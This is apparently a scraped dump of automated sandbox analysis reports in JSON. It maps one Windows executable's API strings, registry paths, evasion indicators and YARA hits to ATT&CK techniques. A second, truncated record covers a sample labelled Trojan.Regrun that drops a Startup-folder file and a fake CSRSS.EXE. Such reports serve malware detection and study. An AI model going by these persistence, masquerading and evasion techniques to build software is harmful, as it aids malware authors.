"https://attack.mitre.org/techniques/T1082", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 1, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "informative_identifiers_count": 1, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "string-120", "type": 2, "relevance": 1, "name": "Contains registry location strings", "description": "\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\\" in Source: 2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\n \"Software\\Microsoft\\Internet Explorer\\Main\" in Source: 2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97", "origin": "File/Memory", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-204", "type": 2, "relevance": 1, "name": "Contains ability to create a new process (API string)", "description": "Found reference to API \"CreateProcessA\" (Indicator: \"CreateProcess\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-423", "type": 2, "relevance": 1, "name": "Contains ability to create directories (API string)", "description": "Found reference to API \"CreateDirectoryA\" (Indicator: \"CreateDirectory\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")", "origin": "File/Memory", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-315", "type": 2, "relevance": 1, "name": "Contains ability to create/open files (API string)", "description": "Found reference to API \"CreateFileA\" (Indicator: \"CreateFile\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-345", "type": 2, "relevance": 1, "name": "Contains ability to disable/close registry key (API string)", "description": "Found reference to API \"RegCloseKey\" (Indicator: \"RegCloseKey\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")", "origin": "File/Memory", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\" file has an entrypoint instructions - \"xor\teax, eax,push\teax,push\teax,push\teax,push\teax,call\tdword ptr [0x403040],push\teax,call\t0x4019d7,push\teax,call\tdword ptr [0x403060],int3\t,sub\tesp, 0xc,push\tebx,push\tebp,push\tesi,push\tedi,push\t0x190,push\t8,mov\tbyte ptr [esp + 0x1b], 0,call\tdword ptr [0x40305c],push\teax,call\tdword ptr [0x403054],mov\tesi, dword ptr [0x403040],push\t0x4032ac,push\t0x4032a0,mov\tebx, eax,call\tesi,mov\tedi, dword ptr [0x403044],push\teax,call\tedi,push\t0x403288,mov\tebp, 0x403278,push\tebp,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-550", "type": 2, "relevance": 1, "name": "Contains ability to find and load resources of specific modules (API string)", "description": "Found reference to API \"SizeofResource\" (Indicator: \"SizeofResource\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")\n Found reference to API \"LoadResource\" (Indicator: \"LoadResource\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")\n Found reference to API \"FindResourceA\" (Indicator: \"FindResource\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-319", "type": 2, "relevance": 1, "name": "Contains ability to set/get the last-error code for a calling thread (API string)", "description": "Found reference to API \"GetLastError\" (Indicator: \"GetLastError\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-307", "type": 2, "relevance": 1, "name": "Contains ability to create/load registry keys (API string)", "description": "Found reference to API \"RegCreateKeyExA\" (Indicator: \"RegCreateKey\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")", "origin": "File/Memory", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-208", "type": 2, "relevance": 1, "name": "Contains ability to show a graphical window (API string)", "description": "Found reference to API \"ShowWindow\" (Indicator: \"ShowWindow\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")", "origin": "File/Memory", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-101", "type": 2, "relevance": 1, "name": "Contains ability to execute Windows APIs", "description": "Found reference to API (Indicator: \"RegSetValueExA\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")\n Found reference to API (Indicator: \"GetUserDefaultLCID\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")\n Found reference to API (Indicator: \"GetSystemDefaultLCID\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")\n Found reference to API (Indicator: \"GetKeyboardLayoutList\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")\n Found reference to API (Indicator: \"CreateProcessA\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")\n Found reference to API (Indicator: \"SizeofResource\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")\n Found reference to API (Indicator: \"CloseHandle\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")\n Found reference to API (Indicator: \"SetEvent\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")\n Found reference to API (Indicator: \"OpenEventA\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")\n Found reference to API (Indicator: \"lstrcpyA\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")\n Found reference to API (Indicator: \"CreateDirectoryA\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")\n Found reference to API (Indicator: \"lstrcatA\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")\n Found reference to API (Indicator: \"CompareStringA\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")\n Found reference to API (Indicator: \"CreateToolhelp32Snapshot\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")\n Found reference to API (Indicator: \"ResetEvent\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")\n Found reference to API (Indicator: \"SetFileAttributesA\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")\n Found reference to API (Indicator: \"GetModuleHandleA\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")\n Found reference to API (Indicator: \"GetProcAddress\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")\n Found reference to API (Indicator: \"DeleteFileA\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")\n Found reference to API (Indicator: \"Process32First\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")\n Found reference to API (Indicator: \"LoadResource\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")\n Found reference to API (Indicator: \"HeapAlloc\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")\n Found reference to API (Indicator: \"HeapFree\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")\n Found reference to API (Indicator: \"GetProcessHeap\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")\n Found reference to API (Indicator: \"ExitProcess\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")\n Found reference to API (Indicator: \"CreateFileA\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")\n Found reference to API (Indicator: \"WaitForSingleObject\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")\n Found reference to API (Indicator: \"WriteFile\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")\n Found reference to API (Indicator: \"OpenProcess\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")\n Found reference to API (Indicator: \"CreateEventA\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")\n Found reference to API (Indicator: \"ExitThread\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")\n Found reference to API (Indicator: \"GetLastError\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")\n Found reference to API (Indicator: \"GetVersionExA\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")\n Found reference to API (Indicator: \"CreateThread\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")\n Found reference to API (Indicator: \"lstrcmpA\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")\n Found reference to API (Indicator: \"FindResourceA\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")\n Found reference to API (Indicator: \"lstrlenA\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")\n Found reference to API (Indicator: \"RegOpenKeyA\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")\n Found reference to API (Indicator: \"RegQueryValueExA\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")\n Found reference to API (Indicator: \"RegCreateKeyExA\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")\n Found reference to API (Indicator: \"RegCloseKey\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")\n Found reference to API (Indicator: \"SHGetFolderPathA\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")\n Found reference to API (Indicator: \"DispatchMessageA\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")\n Found reference to API (Indicator: \"PeekMessageA\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")\n Found reference to API (Indicator: \"TranslateMessage\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")\n Found reference to API (Indicator: \"wsprintfA\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")\n Found reference to API (Indicator: \"MsgWaitForMultipleObjects\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")\n Found reference to API (Indicator: \"DestroyWindow\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")\n Found reference to API (Indicator: \"ShowWindow\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")\n Found reference to API (Indicator: \"CreateWindowExA\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")\n Found reference to API (Indicator: \"LoadLibraryA\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")\n Found reference to API (Indicator: \"VirtualProtect\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")\n Found reference to API (Indicator: \"VirtualAlloc\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")\n Found reference to API (Indicator: \"VirtualFree\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")\n Found reference to API (Indicator: \"RegEnumKeyA\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")\n Found reference to API (Indicator: \"CoInitialize\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-272", "type": 2, "relevance": 1, "name": "Contains ability to retrieve/open a process (API string)", "description": "Found reference to API \"GetProcessHeap\" (Indicator: \"GetProcessHeap\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")\n Found reference to API \"OpenProcess\" (Indicator: \"OpenProcess\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")", "origin": "File/Memory", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-161", "type": 2, "relevance": 1, "name": "Contains ability to retrieve/modify process thread (API string)", "description": "Found reference to API \"CreateThread\" (Indicator: \"CreateThread\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\" has an writable section named \".data\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Pattern Matching", "identifier": "yara-140", "type": 13, "relevance": 2, "name": "YARA signature match – Embedded PE executable", "description": "YARA signature matched on embedded PE in file \"sample.bin\"", "origin": "YARA Signature", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level_human": "informative", "category": "Pattern Matching", "identifier": "yara-26", "type": 13, "relevance": 5, "name": "YARA signature match - PE executable embedded in .rsrc section", "description": "YARA signature for embedded PE executable in .rsrc section matched on file \"sample.bin\"", "origin": "YARA Signature", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "string-310", "type": 2, "relevance": 1, "name": "Contains ability to load modules (API string)", "description": "Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "summary-29", "type": 15, "relevance": 1, "name": "Shows ability to use execution guardrails", "description": "The analysis shows indicators which can be used as execution guardrails to ensure that payload only executes against intended targets/system. Matched sigs: Able to identify virtual environment using user register activity\n Matched sigs: Contains ability to delay execution by waiting for signal/timeout (API string)", "origin": "Indicator Combinations", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-318", "type": 2, "relevance": 1, "name": "Contains ability to load/free library (API string)", "description": "Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")", "origin": "File/Memory", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-304", "type": 2, "relevance": 1, "name": "Contains ability to modify registry key/value (API string)", "description": "Found reference to API \"RegSetValueExA\" (Indicator: \"RegSetValue\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")", "origin": "File/Memory", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-226", "type": 2, "relevance": 1, "name": "Contains ability to delay execution by waiting for signal/timeout (API string)", "description": "Found reference to API \"WaitForSingleObject\" (Indicator: \"WaitForSingleObject\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")\n Found reference to API \"MsgWaitForMultipleObjects\" (Indicator: \"WaitForMultipleObjects\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")", "origin": "File/Memory", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-92", "type": 2, "relevance": 1, "name": "Contains ability to inject code into another process (API string)", "description": "Found reference to API \"CreateThread\" (Indicator: \"CreateThread\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")\n Found reference to API \"VirtualAlloc\" (Indicator: \"VirtualAlloc\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")\n Found reference to API \"VirtualFree\" (Indicator: \"VirtualFree\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")", "origin": "File/Memory", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-663", "type": 2, "relevance": 1, "name": "Able to identify virtual environment using user register activity", "description": "Found string \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\\" (Indicator: \"software\\microsoft\\windows\\currentversion\\uninstall\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")", "origin": "File/Memory", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-201", "type": 2, "relevance": 1, "name": "Contains ability to query system locale (API string)", "description": "Found reference to API \"GetUserDefaultLCID\" (Indicator: \"GetUserDefaultLCID\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")\n Found reference to API \"GetSystemDefaultLCID\" (Indicator: \"GetSystemDefaultLCID\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")", "origin": "File/Memory", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-171", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the OS information (API string)", "description": "Found reference to API \"GetVersionExA\" (Indicator: \"GetVersionExA\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")\n Found reference to API \"GetVersionExA\" (Indicator: \"GetVersion\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-143", "type": 2, "relevance": 1, "name": "Contains ability to retrieve system language (API string)", "description": "Found reference to API \"GetKeyboardLayoutList\" (Indicator: \"GetKeyboardLayoutList\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")", "origin": "File/Memory", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-96", "type": 2, "relevance": 1, "name": "Found registry key string for installed applications", "description": "\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\\" (Indicator: \"microsoft\\windows\\currentversion\\uninstall\") in Source: 2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97", "origin": "File/Memory", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-85", "type": 2, "relevance": 1, "name": "Contains ability to enumerate process and/or its information (API string)", "description": "Found reference to API \"CreateToolhelp32Snapshot\" (Indicator: \"CreateToolhelp32Snapshot\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")\n Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")\n Found reference to API \"Process32First\" (Indicator: \"Process32First\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")", "origin": "File/Memory", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-427", "type": 2, "relevance": 1, "name": "Contains ability to retrieve a module handle (API string)", "description": "Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-229", "type": 2, "relevance": 1, "name": "Contains ability to query registry keys (API string)", "description": "Found reference to API \"RegOpenKeyA\" (Indicator: \"RegOpenKey\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")\n Found reference to API \"RegQueryValueExA\" (Indicator: \"RegQueryValue\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")\n Found reference to API \"RegEnumKeyA\" (Indicator: \"RegEnumKey\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")", "origin": "File/Memory", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-317", "type": 2, "relevance": 1, "name": "Contains ability to retrieve address of exported function from a DLL (API string)", "description": "Found reference to API \"GetProcAddress\" (Indicator: \"GetProcAddress\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-426", "type": 2, "relevance": 1, "name": "Contains ability to modify file attributes (API string)", "description": "Found reference to API \"SetFileAttributesA\" (Indicator: \"SetFileAttributes\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")", "origin": "File/Memory", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-316", "type": 2, "relevance": 1, "name": "Contains ability to terminate a process (API string)", "description": "Found reference to API \"ExitProcess\" (Indicator: \"ExitProcess\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")", "origin": "File/Memory", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-535", "type": 2, "name": "Contains ability to write files (API string)", "description": "Found reference to API \"WriteFile\" (Indicator: \"WriteFile\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")", "origin": "File/Memory", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-308", "type": 2, "relevance": 1, "name": "Contains ability to delete files/directories (API string)", "description": "Found reference to API \"DeleteFileA\" (Indicator: \"DeleteFile\"; File: \"2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97\")", "origin": "File/Memory", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "binary-64", "type": 8, "relevance": 3, "name": "Sample/File contains another embedded binary", "description": "Found multiple string (Indicator: This program cannot be run in DOS mode) in file /tmp/906f5555-2631-4438-89e6-b1b31e8f3838/sample.bin at offset 32174", "origin": "Binary File", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6
https://hybrid-analysis.com/sample/019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6
Hybrid Analysis - Killers
{"size": 163872, "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "submit_name": "019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6", "sha256": "019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6", "av_detect": 94, "vx_family": "Trojan.Regrun", "threat_score": 85, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_processes": 64, "total_signatures": 139, "extracted_files": [{"name": "Empty.pif", "file_path": "%ALLUSERSPROFILE%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif", "file_size": 163872, "sha256": "37c0b50822c2883ace82a302c26b44728de8c9e9d48f5d20a8b6d0520c06868d", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe (PID: 960)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "CSRSS.EXE", "file_path": "%LOCALAPPDATA%\\CSRSS.EXE", "file_size": 163872, "sha256": 